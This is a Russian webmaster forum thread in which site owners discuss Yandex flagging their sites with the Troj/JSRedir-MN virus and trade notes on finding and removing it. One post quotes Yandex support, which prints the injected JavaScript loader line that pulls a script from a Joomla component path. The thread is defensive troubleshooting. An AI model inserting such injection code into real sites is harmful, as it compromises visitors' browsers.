Яндекс нашёл вирус Troj/JSRedir-MN

D
На сайте с 26.01.2012
14
harold12:
насчет слайдера mod_AutsonSlideShow я давно заметил. Все мои сайты, где был этот модуль года пол назад стали считаться зараженными, хотя раньше все Яндекс устраивало

У меня стоит на двух сайтах, но вредоносный код был только на одном.

harold12
На сайте с 17.07.2010
109
Devata:
У меня стоит на двух сайтах, но вредоносный код был только на одном.

у меня только ставлю, сразу аваст ругается

Создание уникальных сайтов по низким ценам на любые тематики. Быстро, недорого, качественно. Для заказа пишите в icq 456101310 или ЛС. Скайп - dmitrii.web@gmail.com
D
На сайте с 26.01.2012
14
harold12:
у меня только ставлю, сразу аваст ругается

Да, есть такое дело

R
На сайте с 24.01.2008
180
q3wzeck:
Тоже обнаружил эту дрянь. Уже не первый раз. Началось примерно месяц назад. Причем "вирус" виден не постоянно, яша сам мне пишет об обнаружении вируса и через день-два пишет что вируса больше нет. DLE сайты 9.7-10.0

Сегодня смотрю - просад по трафу. И снова вирус..

Все верно, скорей всего вирус показывается в определенное время или 1 раз для определенного IP, вариантов много. Так же не всегда все зависит от самого движка, тут нужно смотреть все комплексно код движка, хостера и т.д.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
seosektor
На сайте с 07.02.2013
54

а у меня сегодня тоже вылезло такое предупреждение, один сайт (магазин) на opencart, а другой вообще древний сайт-визитка, еще на HTML написан вручную, нашел пару левых файлов, удалил, подал апелляцию...

harold12
На сайте с 17.07.2010
109

Мне только что Платон ответил:

"При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:

;document.write("<scr"+"ipt src='/components/com_community/models/parr.js'><"+"/script>");

и зараженный файл ...

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. Вскоре после этого антивирус перепроверит сайт и, если опасное содержимое более не будет обнаружено, пометка в выдаче снимется."

А как у Вас обстоит всё?

RS
На сайте с 22.02.2013
8

Тоже столкнулся с этим вирусом на DLE. Ума не приложу, где он сидит. В файле engine/classes/js/jquery.js левого ничего нет (востановил из резервной копии), в uploads тоже ничего

harold12
На сайте с 17.07.2010
109
roma-sk3:
Тоже столкнулся с этим вирусом на DLE. Ума не приложу, где он сидит. В файле engine/classes/js/jquery.js левого ничего нет (востановил из резервной копии), в uploads тоже ничего

Теперь ответили, что в другом файле. Ума не приложу как побороть эту ГовноПС?

R
На сайте с 24.01.2008
180

Размещение вредоносного кода может быть в любом файле и ставится автоматом.

harold12
На сайте с 17.07.2010
109
Rxp:
Размещение вредоносного кода может быть в любом файле и ставится автоматом.

и как его вычистить во всех файлах?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий